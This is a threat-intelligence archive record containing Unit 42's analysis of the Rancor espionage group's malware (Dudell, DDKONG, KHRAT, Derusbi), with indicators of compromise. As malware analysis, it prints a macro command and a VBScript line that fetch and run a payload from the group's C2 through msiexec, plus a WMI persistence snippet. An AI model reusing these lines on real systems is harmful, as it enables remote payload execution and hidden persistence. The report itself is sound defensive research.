{
	"id": "7d04b6ff-183f-42d5-8508-8e52f1a00bbf",
	"created_at": "2026-04-06T00:16:44.948811Z",
	"updated_at": "2026-04-10T03:36:18.528473Z",
	"deleted_at": null,
	"sha1_hash": "5b25a8a994e713bf9371f4f91afeeac9d04ec860",
	"title": "Rancor: Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 185133,
	"plain_text": "Rancor: Cyber Espionage Group Uses New Custom Malware to\r\nAttack Southeast Asia\r\nBy Jen Miller-Osborn, Mike Harbison\r\nPublished: 2019-12-17 · Archived: 2026-04-05 17:57:53 UTC\r\nExecutive Summary\r\nIn late June 2018, Unit 42 revealed a previously unknown cyber espionage group we dubbed Rancor, which\r\nconducted targeted attacks in Southeast Asia throughout 2017 and 2018. In recent attacks, the group has\r\npersistently targeted at least one government organization in Cambodia from December 2018 through January\r\n2019. While researching these attacks, we discovered an undocumented, custom malware family - which we’ve\r\nnamed Dudell. In addition, we discovered the group using Derusbi, which is a malware family believed to be\r\nunique to a small subset of Chinese cyber espionage groups.\r\nAttack Details\r\nBetween early December 2018 and the end of January 2019, Rancor conducted at least two rounds of attacks\r\nintending to install Derusbi or KHRat malware on victim systems. January 2019 sent via 149.28.156[.]61 to\r\ndeliver either Derusbi or KHRat samples with either cswksfwq.kfesv[.]xyz or connect.bafunpda[.]xyz as C2.\r\nMalware Overview\r\nDUDELL\r\nSHA256 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e\r\nFile Type Microsoft Excel 97 - 2003 Document\r\nFile Name Equipment Purchase List 2018-2020(Final).xls\r\nTable 1. DUDELL properties\r\nThe DUDELL sample is a weaponized Microsoft Excel document that contains a malicious macro that runs on the\r\nvictim’s machine. It shares the same malicious behavior reported by Checkpoint in Rancor: The Year of The Phish\r\nSHA-1 c829f5f9ff89210c888c1559bb085ec6e65232de. In Check Point’s blog, the sample is from December 2018\r\nwhile this sample is from April 2018. It has the following metadata:\r\nCodepage 1252\r\nAuthor MS\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 1 of 9\n\nLast author MS\r\nApplication name Microsoft Excel\r\nCreation time Mon Oct 14 23:33:28 1996\r\nLast Save time Wed Apr 11 02:18:59 2018\r\nSecurity type 0\r\nTable 2. DUDELL file metadata\r\nThe macro in this document gets executed when the user views the document and clicks Enable Content, at which\r\npoint the macro locates and executes the data located under the Company field in the document’s properties. The\r\ndata located under the Company field is:\r\ncmd /c set /p=Set v=CreateObject(^\"Wscript.Shell^\"):v.Run ^\"msiexec /q /i http://199.247.6[.]253/ud^\",false,0\r\n\u003cnul \u003e C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs\r\nTable 3. Company field data\r\nThe C2 server 199.247.6[.]253 listed above in Table 5 is known to be used by the Rancor group. The script is\r\ndownloading a second stage payload via the Microsoft tool msiexec. Unfortunately at the time of discovery, the\r\nhosted file is unavailable. Our systems were able to record the hash of file tmp.vbs, but the contents of the file are\r\nno longer available. See Table 5 below for hash values. Pivoting off the filename and directory, we discovered a\r\nsimilar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would\r\nresemble. File office.vbs (SHA256: 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2)\r\nwas discovered in directory c:\\Windows\\System32\\spool\\drivers\\color. The contents of that file are:\r\nSet v=CreateObject(\"Wscript.Shell\"):v.Run \"msiexec /q /i http://199.247.6[.]253/OFFICE\",false,0\r\nTable 4. Contents of office.vbs\r\nSHA256 b958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f832\r\nTable 5. Hashes for tmp.vbs\r\nIf the file tmp.vbs does in fact contain similar content as that of office.vbs, then it could be another method for\r\ndownloading payloads onto the target.\r\nDDKONG Plugin\r\nSHA256 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707\r\nCompile Date and\r\nTime\r\n2017-02-17 08:33:45 AM\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 2 of 9\n\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nFile Name History.nls\r\nTable 6. DDKONG Plugin properties\r\nThe malware in question is configured with the following single export entry:\r\nDllInstall\r\nThe DllInstall export function is responsible for the core behavior of the malware, as just loading it does nothing.\r\nOnce this export is called, it checks for a hidden window with a caption of Hello Google! and a class name of\r\nGoogle see Figure 1 below. This check is performed to ensure that only one instance of the malware is running at\r\na time.\r\nFigure 1. DDKONG Plugin hidden window properties\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 3 of 9\n\nThe hidden window created by the malware filters on any user input (e.g. keyboard or mouse activity). This could\r\nbe an attempt to evade sandbox analysis as mouse and keyboard movement is typically not performed. The\r\nmalware then proceeds to beacon to a configured remote server of cswksfwq.kfesv[.]xyz on TCP port 8080. Upon\r\nsuccessful connection, the malware transmits victim information such as: hostname, IP address, Language Pack\r\nalong with other operating system information. The data transmitted are XOR encoded. The malware supports the\r\nfollowing capabilities:\r\nTerminate specific process\r\nEnumerate processes\r\nUpload file\r\nDownload file\r\nDelete file\r\nList folder contents\r\nEnumerate storage volumes\r\nExecute a command\r\nReverse shell\r\nTake a screenshot\r\nKHRAT\r\nSHA256 aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d38031609\r\nCompile Date and Time 2018-05-02 05:22:23 PM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nFile Name 8081.dll\r\nTable 7. KHRAT properties\r\nThe malware in question is configured with the following single export entry:\r\nRmcmd\r\nWhen the DLL is initially loaded, it dynamically resolves and imports additional modules (DLLs’) needed. Once\r\nloaded and the export entry of Rmcmd is called, it creates a Windows mutex named gkdflbmdfk. This ensures that\r\nonly one copy of the malware is running at a time. It then begins to beacon to a configured domain of\r\nconnect.bafunpda[.]xyz on TCP port 8081. The malware collects and transmits data from the host, such as\r\nhostname and is XOR encoded with the first byte of the network traffic being the key. This malware supports the\r\nfollowing capabilities:\r\nReverse Shell\r\nThe malware behavior and code share similarities with an older KHRAT sample from May 2018. Sample\r\n(SHA256: bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659) has the same export\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 4 of 9\n\nentry name and is also a reverse shell. The newer sample appears to be a re-write for optimization purposes with\r\nthe underlying behavior remaining the same, reverse shell.\r\nDerusbi\r\nSHA256 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d\r\nCompile Date and Time 2012-09-14 09:20:12 AM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nFile Name 32.dll\r\nTable 8. Derusbi properties\r\nDerusbi is a backdoor Trojan believed to be used among a small group of attackers, which includes the Rancor\r\ngroup. This particular sample is a loader that loads an encrypted payload for its functionality. This DLL requires\r\nthe loading executable to include a 32-byte key on the command line to be able to decrypt the embedded payload,\r\nwhich unfortunately we do not have. Even though we don’t have the decryption key or loader, we have uncovered\r\nsome interesting artifacts.\r\nIf the module that loads the sample is named myapp.exe the module will exit\r\nOnce loaded, it sleeps for six seconds\r\nLooks for a Windows pipe named \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll\r\nLooks for a Windows device named \\Device\\acpi_010221\r\nCreates the following registry key\r\nHKEY_CLASSES_ROOT\\CDO.SS_NNTPOnPostEarlySink.2\r\nTwo DWORD values named IDX and Ver.\r\nSaves encrypted data at these keys\r\nThe encryption routine to decrypt the embedded payload is MS_ENH_RSA_AES_PROV\r\nRancor VBScript\r\nIn July 2019, we discovered an interesting VBScript named Chrome.vbs (SHA256:\r\n0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2) associated with the\r\nRancor group. This particular VBScript payload beacons to domain bafunpda[.]xyz, which is also used by the\r\nKHRAT Trojan listed above in Table 2. This VBScript is obfuscated and contains packed data that is used to infect\r\na target with multiple chained persistent artifacts. The following illustrates the behavior when the VBScript is\r\nexecuted:\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 5 of 9\n\nFigure 2. VBScript execution flow\r\nFigure 1 provides a visual overview of when the VBScript is executed on a host. The script performs the following\r\nactions:\r\n1. Copies regsvr32.exe from %windir%\\syswow64 to %windir%\\spoolsw.exe.\r\n2. Creates a text file named vdfjgklffsdfmv.txt in the host’s %TMP% folder. This file is not a text file, but a\r\nWindows Management Object File MOF.\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 6 of 9\n\n3. Executes Windows mofcomp.exe passing in the MOF file created in step 2.\r\n4. Adds data to two registry keys: classes and media. Data is saved in the default keys.\r\n5. Reads the blob of data from the registry key classes created in step 4 and saves the data to file\r\n%windir%\\pla.dat.\r\nThe MOF file created by the VBScript is used as a persistence mechanism via Windows Management\r\nInstrumentation (WMI) Event Subscriptions. MOF files are compiled scripts that describe Common Information\r\nModel (CIM) classes, which are compiled into the WMI repository. The technique is described by MITRE\r\nATT\u0026CK IDT1084. This particular MOF file creates a timer event that is triggered every five seconds. Snippet of\r\nthe MOF file is illustrated in Figure 3 below:\r\ninstance of CommandLineEventConsumer as $Cons\r\n{\r\nName = \"SCM Event Log Filter\";\r\nRunInteractively=false;\r\nCommandLineTemplate=\"c:\\\\windows\\\\spoolsw.exe /s /n /i c:\\\\windows\\\\pla.dat\";\r\n};\r\ninstance of __EventFilter as $Filt\r\n{\r\nName = \"SCM Event Log Filter\";\r\nEventNamespace = \"Root\\\\Cimv2\";\r\nQuery = \"Select * From __InstanceModificationEvent \"\r\n\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"\r\n\"And TargetInstance.Second = 5\";\r\nQueryLanguage = \"WQL\";\r\n};\r\nFigure 3. Snippet of MOF file\r\nFigure 3 shows the main functionality of the MOF file. It has a unique name of SCM Event Log Filter and runs\r\nspoolsw.exe every 5 seconds, with the /s /n /i parameters passing in file pla.dat. If we recall earlier from the\r\nVBScript, spoolsw.exe is the hosts Windows regsvr32.exe. Regsvr32.exe is a Windows tool that registers a\r\nmodule (DLL). The parameters passed instruct regsvr32 not to display any message boxes (/s), do not call\r\nDllRegisterServer or DllUnregisterServer (/n) and calls DllInstall (/i). File pla.dat therefore must be a DLL.\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 7 of 9\n\nThe registry values created by the VBScript are as follows:\r\n1. HKEY_CURRENT_USER\\Software\\Classes\r\nContains x86 code for a DLL. It is missing the first byte of 0x4 which is added by the VBScript\r\nwhen file pla.dat is created.\r\nFile Properties for embedded registry data at HKEY_CURRENT_USER\\Software\\Classes\r\nSHA256 DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E\r\nCompile Date and\r\nTime\r\n2018-04-24 10:51:14 PM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nExport Table DllInstall\r\nTable 9. Reg Classes embedded data properties\r\nThe DLL embedded in this registry key is a simple loader that loads the code from the registry\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Clients\\Media\r\n1. HKEY_LOCAL_MACHINE\\SOFTWARE\\Clients\\Media\r\nContains shellcode and x86 code for a DLL. Data saved in registry is encoded with a XOR key of\r\n0x9C.\r\nSHA256 CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A\r\nCompile Date\r\nand Time\r\n2018-01-10 09:16:42 PM\r\nFile Type PE32 executable (DLL) Intel 80386, for MS Windows\r\nTable 10. Decoded media DLL data properties\r\nThe DLL located in the Media registry key is a variant of the KHRAT Trojan. It beacons to domain\r\nconnect.bafunpda[.]xyz and attempts to connect to TCP port 4433. This is the same domain used by the KHRAT\r\nTrojan listed above in Table 2 and shares the same behavior.\r\nConclusion\r\nRancor, a cyber espionage group active since at least 2017, continues to conduct targeted attacks in Southeast Asia\r\nand has been found using an undocumented, custom malware family - which we’ve dubbed Dudell - to download\r\na second stage payload once its malicious macro is executed. Additionally, Rancor is also using the Derusbi\r\nmalware family to load a secondary payload once it infiltrates a target.\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 8 of 9\n\nPalo Alto Networks customers are protected from this threat. Our threat prevention platform detects these malware\r\nfamilies, with Wildfire while and simultaneously updating the ‘malware’ category within the PAN-DB URL\r\nfiltering solution for compromised domains it has identified. AutoFocus customers can further investigate this\r\nactivity with the following tags:\r\nRancor\r\nPLAINTEE\r\nDUDELL\r\nDerusbi\r\nIndicators of Compromise\r\nSHA256:\r\n0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707\r\nAAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609\r\n0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E\r\nDB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E\r\nCC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A\r\nBC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659\r\n83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d\r\nC2s\r\ncswksfwq.kfesv[.]xyz\r\nConnect.bafunpda[.]xyz\r\n199.247.6[.]253\r\nSource: https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nhttps://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/"
	],
	"report_names": [
		"rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia"
	],
	"threat_actors": [
		{
			"id": "e8aee970-e31e-489f-81c2-c23cd52e255c",
			"created_at": "2023-01-06T13:46:38.763687Z",
			"updated_at": "2026-04-10T02:00:03.092181Z",
			"deleted_at": null,
			"main_name": "RANCOR",
			"aliases": [
				"Rancor Group",
				"G0075",
				"Rancor Taurus",
				"Rancor group",
				"Rancor"
			],
			"source_name": "MISPGALAXY:RANCOR",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6d11e45c-4e31-4997-88f5-295b2564cfc6",
			"created_at": "2022-10-25T15:50:23.794721Z",
			"updated_at": "2026-04-10T02:00:05.358892Z",
			"deleted_at": null,
			"main_name": "Rancor",
			"aliases": [
				"Rancor"
			],
			"source_name": "MITRE:Rancor",
			"tools": [
				"DDKONG",
				"PLAINTEE",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "416f8374-2b06-47e4-ba91-929b3f85d9bf",
			"created_at": "2022-10-25T16:07:24.093951Z",
			"updated_at": "2026-04-10T02:00:04.864244Z",
			"deleted_at": null,
			"main_name": "Rancor",
			"aliases": [
				"G0075",
				"Rancor Group",
				"Rancor Taurus"
			],
			"source_name": "ETDA:Rancor",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"DDKONG",
				"Derusbi",
				"Dudell",
				"ExDudell",
				"KHRAT",
				"PLAINTEE",
				"RoyalRoad",
				"certutil",
				"certutil.exe",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434604,
	"ts_updated_at": 1775792178,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5b25a8a994e713bf9371f4f91afeeac9d04ec860.pdf",
		"text": "https://archive.orkl.eu/5b25a8a994e713bf9371f4f91afeeac9d04ec860.txt",
		"img": "https://archive.orkl.eu/5b25a8a994e713bf9371f4f91afeeac9d04ec860.jpg"
	}
}